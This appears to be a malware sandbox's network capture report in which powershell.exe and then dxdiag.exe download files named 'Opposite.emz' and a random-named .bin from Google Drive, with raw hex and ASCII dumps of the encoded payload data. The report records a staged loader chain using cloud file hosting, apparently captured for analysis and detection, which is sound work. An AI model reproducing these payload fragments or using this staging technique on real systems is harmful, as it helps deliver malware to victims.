                              Content-Security-Policy: script-src 'nonce-JeOAX0uUHBOnrQLPsE8-Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.549706142.250.184.1934437156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              TimestampBytes transferredDirectionData
                              2024-10-01 05:49:37 UTC233OUTGET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
                              2024-10-01 05:49:39 UTC4852INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Content-Security-Policy: sandbox
                              Content-Security-Policy: default-src 'none'
                              Content-Security-Policy: frame-ancestors 'none'
                              X-Content-Security-Policy: sandbox
                              Cross-Origin-Opener-Policy: same-origin
                              Cross-Origin-Embedder-Policy: require-corp
                              Cross-Origin-Resource-Policy: same-site
                              X-Content-Type-Options: nosniff
                              Content-Disposition: attachment; filename="Opposite.emz"
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Credentials: false
                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                              Accept-Ranges: bytes
                              Content-Length: 469128
                              Last-Modified: Mon, 30 Sep 2024 07:28:36 GMT
                              X-GUploader-UploadID: AD-8ljsZDZwaBsdPeGm2MWtGborGd6GXoY1iRyv7Mas4bvuIPD6zEKbWj5MIj8Tt4Sw3xHNbpm7digJMmw
                              Date: Tue, 01 Oct 2024 05:49:39 GMT
                              Expires: Tue, 01 Oct 2024 05:49:39 GMT
                              Cache-Control: private, max-age=0
                              X-Goog-Hash: crc32c=Qpsdaw==
                              Server: UploadServer
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-10-01 05:49:39 UTC4852INData Raw: 36 77 4a 74 56 58 45 42 6d 37 75 47 34 68 49 41 36 77 49 34 32 6e 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 69 44 66 75 52 62 74 4a 6f 4c 72 41 68 52 56 36 77 4c 6f 46 6f 48 78 53 34 37 54 2b 4f 73 43 30 41 6c 78 41 5a 75 42 36 56 31 6a 39 58 70 78 41 5a 76 72 41 73 70 52 36 77 49 52 65 75 73 43 34 45 79 36 76 30 48 77 59 75 73 43 62 43 48 72 41 67 6d 6f 36 77 49 2b 30 48 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4c 75 52 39 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4c 53 46 4f 73 43 42 52 71 42 2b 54 72 67 50 41 4e 38 7a 48 45 42 6d 2b 73 43 6d 73 32 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 4e 78 41 5a 76 72 41 6e 65 4a 67 63 4f 4e 39 73 38 42 63 51 47 62 63 51 47 62 75 6e 4d 32 52 58 5a 78 41 5a 76 72 41 6f 74
                              Data Ascii: 6wJtVXEBm7uG4hIA6wI42nEBmwNcJARxAZvrAiDfuRbtJoLrAhRV6wLoFoHxS47T+OsC0AlxAZuB6V1j9XpxAZvrAspR6wIReusC4Ey6v0HwYusCbCHrAgmo6wI+0HEBmzHKcQGbcQGbiRQLcQGb6wLuR9HicQGbcQGbg8EE6wLSFOsCBRqB+TrgPAN8zHEBm+sCms2LRCQEcQGbcQGbicNxAZvrAneJgcON9s8BcQGbcQGbunM2RXZxAZvrAot
                              2024-10-01 05:49:39 UTC4852INData Raw: 65 43 6d 52 57 54 37 59 61 55 6f 6b 46 6e 50 34 66 77 65 71 6c 2b 43 31 4a 48 6b 65 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6e 76 34 4d 44 45 45 52 71 49 79 6f 2b 69 42 31 32 6c 58 50 39 69 47 4a 6a 6b 51 52 46 70 71 6f 70 62 38 71 53 6b 79 74 43 73 71 4b 54 33 71 72 70 64 4a 75 32 7a 79 73 67 6d 6e 72 51 75 6f 6b 6f 48 39 56 68 73 4e 46 77 66 4f 72 58 50 45 5a 4e 6d 62 2b 6a 66 71 54 4b 37 42 44 30 4a 38 4a 58 38 31 76 4f 38 31 65 77 37 5a 71 72 31 37 39 53 37 44 46 42 68 43 56 43 48 4a 6e 51 6d 63 42 47 74 56 6e 5a 30 77 72 35 56 65 45 73 6a 66 4d 62 6e 5a 79 70 32 79 74 52 31 6f 44 6d 5a 71 70 59 48 6d 75 32 30 79 73 79 41 4e 2b 66 45 6f 6d 61 76 38 53 45 74 4e 54 73 52 35 72 57 45 61 59 56 76 6b 57 64
                              Data Ascii: eCmRWT7YaUokFnP4fweql+C1JHkeIyt5SyMreUsjK3lLIyt5SyMreUsjK3nv4MDEERqIyo+iB12lXP9iGJjkQRFpqopb8qSkytCsqKT3qrpdJu2zysgmnrQuokoH9VhsNFwfOrXPEZNmb+jfqTK7BD0J8JX81vO81ew7Zqr179S7DFBhCVCHJnQmcBGtVnZ0wr5VeEsjfMbnZyp2ytR1oDmZqpYHmu20ysyAN+fEomav8SEtNTsR5rWEaYVvkWd
                              2024-10-01 05:49:39 UTC145INData Raw: 46 2f 30 45 65 6b 45 41 78 67 6f 52 6f 67 37 41 57 71 62 57 50 66 69 57 2f 6f 77 55 2b 4f 74 52 49 73 43 6d 65 58 74 4c 49 2b 65 55 34 41 6c 36 42 4d 35 31 58 32 37 47 69 63 31 34 51 50 75 71 4b 44 6f 42 69 2f 7a 6b 71 58 31 7a 2f 62 4a 4d 53 4a 31 6d 79 4a 48 57 4b 6e 35 76 58 4f 2f 57 6a 6b 59 45 66 4e 65 74 57 71 4d 52 55 5a 4e 6f 7a 42 71 61 63 71 63 56 70 36 71 51 69 65 30 76 6a 38 72 69 32 46 7a 6b 57 36 71 51 38 36 77 6a 66
                              Data Ascii: F/0EekEAxgoRog7AWqbWPfiW/owU+OtRIsCmeXtLI+eU4Al6BM51X27Gic14QPuqKDoBi/zkqX1z/bJMSJ1myJHWKn5vXO/WjkYEfNetWqMRUZNozBqacqcVp6qQie0vj8ri2FzkW6qQ86wjf
                              2024-10-01 05:49:39 UTC1320INData Raw: 73 49 61 4d 47 56 46 6d 32 38 39 6b 30 38 4f 52 47 61 36 48 43 66 31 2b 33 51 47 75 6a 5a 31 30 4d 2f 6d 73 2f 5a 76 6b 74 6f 67 79 67 38 50 66 55 5a 55 4d 66 68 2f 42 78 4b 35 48 4d 73 6b 65 49 2f 5a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 66 6a 62 50 6a 77 58 46 78 4b 66 4c 74 4d 49 56 62 5a 66 37 2f 7a 54 54 6c 68 52 43 5a 32 6f 43 78 4f 36 71 6e 31 76 38 72 63 64 78 69 77 72 62 57 38 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 33 55 4e 64 71 71 6d 67 31 76 55 66 47 36 71 32 4c 30 6b 6a 4b 38 49 4f 2f 45 4d 78 52 43 4c 61 41 6b 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4f 44 77 71 6f 38 61 53 7a 41 36 48 79 37 64 49 54 4f
                              Data Ascii: sIaMGVFm289k08ORGa6HCf1+3QGujZ10M/ms/Zvktogyg8PfUZUMfh/BxK5HMskeI/ZK3lLIyt5SyMreUsjK3lLIyt5SyMrefjbPjwXFxKfLtMIVbZf7/zTTlhRCZ2oCxO6qn1v8rcdxiwrbW8jK3lLIyt5SyMreUsjK3lLIyt5SyMr3UNdqqmg1vUfG6q2L0kjK8IO/EMxRCLaAksjK3lLIyt5SyMreUsjK3lLIyt5SyODwqo8aSzA6Hy7dITO
                              2024-10-01 05:49:39 UTC1390INData Raw: 38 6e 73 6b 69 50 44 54 4a 6f 4e 57 50 4b 4c 37 72 7a 65 51 31 76 49 55 5a 58 76 67 78 79 57 6a 56 71 75 59 36 31 74 55 58 4a 36 62 52 54 78 78 32 34 38 50 71 78 33 38 4e 31 35 4f 4d 33 6b 66 6f 78 37 7a 43 41 35 35 65 32 70 58 72 58 46 6f 73 55 72 70 38 64 48 70 57 4d 63 37 37 4c 43 70 73 52 34 53 79 4f 54 4f 31 77 64 57 33 5a 4b 46 41 4e 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 6c 57 68 42 44 4e 61 55 43 69 47 41 52 58 6e 51 67 74 61 49 61 56 54 2f 54 56 55 63 30 39 5a 6d 74 43 39 47 4b 52 59 6d 70 36 45 79 4c 67 39 34 79 63 67 70 38 32 6b 57 77 52 63 57 47 69 44 6c 37 78 37 59 50 64 72 45 66 4e 76 75 4f 76 6e 43 4b 32 76 72 62 75 45 6e 4f 45 4e 74 48 51 61 66 4a 65 42 59 4a 72 72 38 31 33 34 57 64 54 53 6f
                              Data Ascii: 8nskiPDTJoNWPKL7rzeQ1vIUZXvgxyWjVquY61tUXJ6bRTxx248Pqx38N15OM3kfox7zCA55e2pXrXFosUrp8dHpWMc77LCpsR4SyOTO1wdW3ZKFAN5SyMreUsjK3lLIyt5SyMreUsjK3lLlWhBDNaUCiGARXnQgtaIaVT/TVUc09ZmtC9GKRYmp6EyLg94ycgp82kWwRcWGiDl7x7YPdrEfNvuOvnCK2vrbuEnOENtHQafJeBYJrr8134WdTSo
                              2024-10-01 05:49:40 UTC1390INData Raw: 4c 49 36 41 38 44 33 57 56 55 43 54 4b 51 76 69 39 43 74 6f 2f 78 61 4c 64 75 64 49 42 53 50 69 6c 58 71 68 31 2b 61 4c 46 4e 42 71 6a 2b 66 42 56 4e 78 59 41 41 53 32 6a 6f 43 41 79 2f 65 34 56 36 50 4d 38 66 2f 49 44 76 6d 64 68 77 4e 2f 52 69 39 4d 65 62 65 2b 70 6e 61 74 78 45 57 7a 78 57 4c 6f 79 7a 58 39 66 35 6c 55 51 64 54 6d 48 49 42 38 33 55 4c 65 4e 6d 50 47 34 44 76 72 49 4f 44 71 32 31 39 58 44 77 70 69 42 2b 38 75 44 6c 59 4e 63 32 71 6c 4c 66 61 39 7a 62 73 32 4e 30 33 4e 44 76 69 6e 72 6f 4d 32 72 73 2f 68 7a 5a 6c 6b 37 37 6c 62 6a 4c 2f 56 4c 59 66 77 2f 6f 74 32 73 35 32 77 57 2b 4c 32 44 65 31 6f 35 6f 73 56 6b 2f 73 6f 51 4c 74 65 71 7a 48 68 38 76 71 36 34 4d 43 46 73 34 73 58 53 53 62 38 74 34 61 59 70 4d 6b 47 56 32 69 67 2f 72 70
                              Data Ascii: LI6A8D3WVUCTKQvi9Cto/xaLdudIBSPilXqh1+aLFNBqj+fBVNxYAAS2joCAy/e4V6PM8f/IDvmdhwN/Ri9Mebe+pnatxEWzxWLoyzX9f5lUQdTmHIB83ULeNmPG4DvrIODq219XDwpiB+8uDlYNc2qlLfa9zbs2N03NDvinroM2rs/hzZlk77lbjL/VLYfw/ot2s52wW+L2De1o5osVk/soQLteqzHh8vq64MCFs4sXSSb8t4aYpMkGV2ig/rp
                              2024-10-01 05:49:40 UTC1390INData Raw: 77 38 61 6d 6c 4f 58 52 4c 43 71 75 42 50 42 78 42 48 4b 34 6d 65 44 45 73 75 71 69 4c 44 6b 74 52 54 4b 34 69 58 77 63 6c 57 69 65 4c 43 55 6a 54 33 34 49 56 33 51 32 56 70 66 51 34 75 6b 30 32 6f 36 78 36 52 65 68 36 69 31 39 4f 32 4f 34 38 6f 70 30 35 73 67 79 68 63 50 44 35 41 35 33 69 6e 7a 70 56 4d 43 4e 68 61 49 65 64 35 52 48 72 7a 47 55 6d 6c 55 6f 31 37 38 4a 6e 35 6d 54 4c 47 6d 71 68 50 4b 48 76 79 74 44 67 48 42 44 34 55 44 2f 4e 6e 33 6d 6d 36 63 4a 61 39 52 56 33 4d 71 31 65 62 55 2f 6c 63 31 63 4d 48 48 70 72 47 6a 68 43 76 2b 33 64 56 75 49 63 6f 6e 44 78 45 5a 4f 56 50 34 54 77 63 73 4a 6e 51 6e 31 41 78 76 53 37 49 46 71 5a 4a 34 77 6c 47 4e 6c 43 58 4b 30 4c 71 37 4c 73 2b 71 6b 73 51 75 62 38 48 4b 30 4c 69 43 71 55 32 71 69 69 53 48
                              Data Ascii: w8amlOXRLCquBPBxBHK4meDEsuqiLDktRTK4iXwclWieLCUjT34IV3Q2VpfQ4uk02o6x6Reh6i19O2O48op05sgyhcPD5A53inzpVMCNhaIed5RHrzGUmlUo178Jn5mTLGmqhPKHvytDgHBD4UD/Nn3mm6cJa9RV3Mq1ebU/lc1cMHHprGjhCv+3dVuIconDxEZOVP4TwcsJnQn1AxvS7IFqZJ4wlGNlCXK0Lq7Ls+qksQub8HK0LiCqU2qiiSH
                              2024-10-01 05:49:40 UTC1390INData Raw: 70 74 47 49 33 6a 44 41 6b 53 59 42 4f 41 51 4b 33 65 42 6d 4f 49 49 5a 49 36 55 32 61 57 57 61 4e 5a 58 68 46 69 73 74 63 6b 69 61 75 75 68 43 6e 36 79 44 41 72 71 39 35 53 79 4f 52 41 49 4a 68 6a 70 45 69 56 53 39 35 68 34 78 2b 56 72 54 6b 6a 45 55 42 70 35 59 48 46 37 56 62 67 33 66 70 71 54 59 30 5a 6d 36 4c 74 44 79 4f 64 74 6d 47 37 47 4c 43 32 38 4b 2b 54 79 4d 72 49 6e 72 78 6f 76 7a 35 49 69 74 35 77 76 4e 37 4c 2f 57 50 62 39 57 56 6f 74 30 4f 63 33 68 75 2b 4b 55 52 52 49 37 51 71 68 55 6e 35 52 4f 32 4e 38 4a 70 30 38 31 2b 41 30 4d 77 34 63 4a 42 73 52 48 4e 45 75 4f 73 74 48 48 64 4e 69 77 6f 67 64 55 70 4b 50 6b 56 71 4b 37 4c 53 69 4d 72 74 63 46 34 79 31 74 36 2b 4f 43 37 2f 75 55 45 52 78 37 31 33 52 6a 37 46 76 4a 6d 4f 6a 31 48 7a 64
                              Data Ascii: ptGI3jDAkSYBOAQK3eBmOIIZI6U2aWWaNZXhFistckiauuhCn6yDArq95SyORAIJhjpEiVS95h4x+VrTkjEUBp5YHF7Vbg3fpqTY0Zm6LtDyOdtmG7GLC28K+TyMrInrxovz5Iit5wvN7L/WPb9WVot0Oc3hu+KURRI7QqhUn5RO2N8Jp081+A0Mw4cJBsRHNEuOstHHdNiwogdUpKPkVqK7LSiMrtcF4y1t6+OC7/uUERx713Rj7FvJmOj1Hzd
                              2024-10-01 05:49:40 UTC1390INData Raw: 43 73 6d 34 32 75 58 34 59 61 6e 70 4a 66 74 49 63 6f 58 44 2b 6d 55 36 59 6d 31 76 4a 76 38 6f 38 68 57 64 58 54 4d 44 4e 35 51 77 6f 4f 6f 66 57 32 65 33 6f 43 47 66 51 77 76 56 62 72 6e 77 73 4d 73 4b 6d 31 76 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 2b 46 72 41 30 48 66 79 68 63 50 46 41 6f 73 43 69 37 30 45 2f 51 78 30 4b 4c 63 72 68 32 78 64 2f 69 6b 6e 76 35 61 6b 36 4c 73 72 77 64 71 4f 79 6a 58 71 73 70 34 63 72 34 54 73 7a 49 72 44 4a 4e 46 6e 79 30 36 4d 46 6a 4b 4c 2b 5a 4e 58 70 34 35 50 67 52 69 2f 37 42 75 53 37 2b 58 6a 4a 7a 6f 69 6e 31 42 7a 39 39 79 2b 44 5a 54 2b 41 70 4c 49 79 54 39 7a 6f 55 76 65 52 53 69 42 31 31 38 6d 38 34 44 74 4c 61 7a 65 55 73 6a 65 4d 4a 31 43 52 75 36 79 75 42 32
                              Data Ascii: Csm42uX4YanpJftIcoXD+mU6Ym1vJv8o8hWdXTMDN5QwoOofW2e3oCGfQwvVbrnwsMsKm1vIyt5SyMreUsjK3lLIyt5SyMreUsjK+FrA0HfyhcPFAosCi70E/Qx0KLcrh2xd/iknv5ak6LsrwdqOyjXqsp4cr4TszIrDJNFny06MFjKL+ZNXp45PgRi/7BuS7+XjJzoin1Bz99y+DZT+ApLIyT9zoUveRSiB118m84DtLazeUsjeMJ1CRu6yuB2
                              2024-10-01 05:49:40 UTC1390INData Raw: 35 71 68 55 7a 71 6f 34 43 31 74 56 65 79 74 52 74 6f 57 42 59 71 6f 36 78 54 71 41 31 77 68 51 43 70 37 41 50 66 37 6b 33 35 39 41 64 49 57 7a 45 79 76 6c 64 55 77 50 32 61 50 38 2f 49 51 47 43 46 68 4e 37 4d 52 6a 71 68 30 48 6a 37 68 6d 58 51 6c 43 54 37 4b 55 79 4a 58 54 47 56 67 55 38 6f 68 71 61 78 7a 59 50 35 36 71 49 37 61 50 58 30 73 72 53 64 35 6c 4f 6c 71 71 49 67 6e 51 46 46 63 72 69 43 76 45 6e 61 6e 6e 6c 77 73 45 69 63 39 59 62 34 67 39 61 67 58 36 63 35 52 2b 55 36 55 74 51 62 63 6f 48 50 58 2b 76 49 64 41 54 78 50 64 39 2b 6b 59 73 6a 7a 67 62 4f 52 69 66 4f 47 62 72 69 73 76 74 55 5a 50 37 62 56 46 4e 2f 4a 6c 35 45 35 55 53 6f 74 79 2f 41 63 64 47 64 6b 76 39 54 58 6c 4c 49 79 74 35 53 79 4d 72 65 55 73 6a 4b 33 6c 4c 49 79 74 35 53 79
                              Data Ascii: 5qhUzqo4C1tVeytRtoWBYqo6xTqA1whQCp7APf7k359AdIWzEyvldUwP2aP8/IQGCFhN7MRjqh0Hj7hmXQlCT7KUyJXTGVgU8ohqaxzYP56qI7aPX0srSd5lOlqqIgnQFFcriCvEnannlwsEic9Yb4g9agX6c5R+U6UtQbcoHPX+vIdATxPd9+kYsjzgbORifOGbrisvtUZP7bVFN/Jl5E5USoty/AcdGdkv9TXlLIyt5SyMreUsjK3lLIyt5Sy


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.565310216.58.206.464431900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              2024-10-01 05:50:12 UTC216OUTGET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Cache-Control: no-cache
                              2024-10-01 05:50:12 UTC1610INHTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Tue, 01 Oct 2024 05:50:12 GMT
                              Location: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce-PAEnktS4bsdUMEzPLTFhwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.565312142.250.184.1934431900C:\Windows\SysWOW64\dxdiag.exe
                              TimestampBytes transferredDirectionData
                              2024-10-01 05:50:13 UTC258OUTGET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Cache-Control: no-cache
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
                              2024-10-01 05:50:15 UTC4874INHTTP/1.1 200 OK
                              Content-Type: application/octet-stream
                              Content-Security-Policy: sandbox
                              Content-Security-Policy: default-src 'none'
                              Content-Security-Policy: frame-ancestors 'none'
                              X-Content-Security-Policy: sandbox
                              Cross-Origin-Opener-Policy: same-origin
                              Cross-Origin-Embedder-Policy: require-corp
                              Cross-Origin-Resource-Policy: same-site
                              X-Content-Type-Options: nosniff
                              Content-Disposition: attachment; filename="AdaOvKwRExIVoUgGjncZSiKgxzCr41.bin"
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Credentials: false
                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                              Accept-Ranges: bytes
                              Content-Length: 106560
                              Last-Modified: Mon, 30 Sep 2024 01:14:56 GMT
                              X-GUploader-UploadID: AD-8ljv4OQVeMP1JEepWGRVeBq8YUrAloelCmvKYi8sZgh6FlgGUkuW5p8Z1OyclvEDxeg7g4mC500HTAw
                              Date: Tue, 01 Oct 2024 05:50:15 GMT
                              Expires: Tue, 01 Oct 2024 05:50:15 GMT
                              Cache-Control: private, max-age=0
                              X-Goog-Hash: crc32c=NuJ1eg==
                              Server: UploadServer
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-10-01 05:50:15 UTC4874INData Raw: 4c d4 d0 e8 0d e5 26 cb 32 34 15 95 8a 0a e7 8a 38 57 03 dc 8a 9c 04 ec 60 50 3a 10 29 b7 60 a8 bd 4c a4 a4 3d af 33 a9 68 60 72 4d a2 5b 06 85 00 b8 8a 9b 26 9f 4b 6e 38 0f 48 3e d9 a3 92 8c e6 88 c0 e3 97 85 54 3c c4 dc 12 19 3a b8 ee e2 bc 06 4a 4a 73 3b b0 96 ac cd b8 0c c3 e5 5b d1 81 ac 4b a9 22 a1 d0 b3 b7 40 df 9d af 5b 0a dc 3c 41 32 e3 67 19 69 f5 c8 c3 fa 1e 03 56 58 02 fc dc d7 49 e1 0a de ad 99 a7 0e f1 a9 9a 33 f9 7b 42 85 c9 1c 1c 79 2a 8d 3b 45 0d ab 00 48 42 a7 84 e9 1f 90 4e ee 27 62 12 25 bc 38 0a d4 2c b9 19 21 35 77 8b df 5a 6f 76 1e 7d 79 21 bc 18 ca de 2b 3d 33 86 9e 5f d9 f8 e5 ce 66 48 ed eb f6 be be 0d 23 21 51 6c b3 35 7a d7 2d b8 19 37 74 cd 3e dc e0 ef e1 88 70 b7 73 e6 33 e3 5e 5e 0a eb 89 ed 5c af a5 60 74 aa 01 e8 78 f1 f3
                              Data Ascii: L&248W`P:)`L=3h`rM[&Kn8H>T<:JJs;[K"@[<A2giVXI3{By*;EHBN'b%8,!5wZov}y!+=3_fH#!Ql5z-7t>ps3^^\`tx
                              2024-10-01 05:50:15 UTC4874INData Raw: d3 c6 ee f6 d2 c4 c7 82 8f b0 e3 9f 2a 20 53 8c b6 47 d0 fe f5 5e 82 24 59 99 bf d1 f2 57 0b ee 87 6a d9 4b 38 16 e0 6f 91 16 7a 74 24 17 90 2c f2 7f 93 70 e9 00 d7 f1 93 97 76 d4 75 36 48 53 dc 42 b3 b6 10 43 8c 20 96 47 e1 1b c8 49 20 89 ca a5 d9 0b e0 01 61 b4 1c cc f8 62 d2 b9 9e 77 ad a8 05 14 81 a7 5f 63 4a cc 18 39 65 9a 4b ef 50 18 db f8 56 95 f5 65 77 79 06 a9 63 98 71 79 a2 15 4e 79 1f 9c 50 f3 c8 7c c7 16 a4 20 32 ea e7 c6 f3 3e 0e 20 7d af 47 87 cb ea 89 55 e2 a8 b0 43 a2 05 d7 6a 7f 4f a7 da de 69 78 53 16 cf 69 1d 9f 3b 97 0a bd 8b 30 ca 55 26 6a 26 30 84 e0 2f b2 12 5b e7 1d fd 12 38 65 b5 6f 6b 06 61 ad b8 8a d5 3d c2 64 93 94 14 f9 46 5c a5 b5 a8 3e fc db 1e 4b b4 09 cf 73 90 ff 09 a1 6b e8 3c 63 69 c3 95 48 65 3d aa 98 81 0a c9 c6 3e c9
                              Data Ascii: * SG^$YWjK8ozt$,pvu6HSBC GI abw_cJ9eKPVewycqyNyP| 2> }GUCjOixSi;0U&j&0/[8eoka=dF\>Ksk<ciHe=>
                              2024-10-01 05:50:15 UTC77INData Raw: 96 78 b6 41 23 22 aa 59 45 c4 17 53 48 fe d2 63 00 04 df 1f e0 d3 f8 5b 07 77 6a 7d f7 de ce cc bc ec 13 ce 0e 9b 97 f0 84 8a 5a a4 4c 7d e3 b6 25 4d f1 ae a3 ee 4f 48 f3 23 53 3f 01 d0 88 87 75 70 88 f7 07 0e 28 e9 58 7e f3 f7 13
                              Data Ascii: xA#"YESHc[wj}ZL}%MOH#S?up(X~
                              2024-10-01 05:50:15 UTC1322INData Raw: 2b 0a 32 05 3f 99 c3 d5 8b 8f 9c 6a 82 53 d6 99 00 a2 30 35 23 27 34 1c 3f c1 51 bc 4d 12 3b 91 a5 88 34 57 4c c2 fb d6 97 9c 6f 76 a0 cf 05 7e 15 23 b1 2a 65 42 e7 e9 0b ca 6c a4 d7 1e 6a 90 0a a7 40 1a af ed 76 35 23 50 11 c0 3e 74 1d 69 63 e3 07 f5 d3 c5 d8 d1 54 d9 5c 2d 4a 0c de 78 f8 f2 15 16 21 61 04 81 0a 6a f3 fa 3e c6 63 3a 0a 85 c8 6a af f1 12 9f 62 44 2f c1 77 4a 49 e7 c7 4f e0 11 d5 19 90 70 9e 15 e0 d1 6c ca e7 b1 9f 10 e6 74 4a 7e 2f 57 90 28 04 c5 f2 58 ea a8 39 18 3d fd af 62 a4 d3 62 d1 ec 45 35 05 83 f6 17 f1 04 61 6d de 4d 9e 79 4b 4f 78 d1 4d ca fa d6 43 5b 75 3b 75 cb 79 24 ca 83 52 e7 e7 f8 4b f8 98 cd 53 21 fc 84 4e 4a 5b b3 e5 43 4c c4 a5 08 e8 9e 18 4c a1 58 db b5 c2 ba 6a 39 98 1e ca 40 66 2c a2 75 05 22 59 5e ba b8 e2 92 5a a8
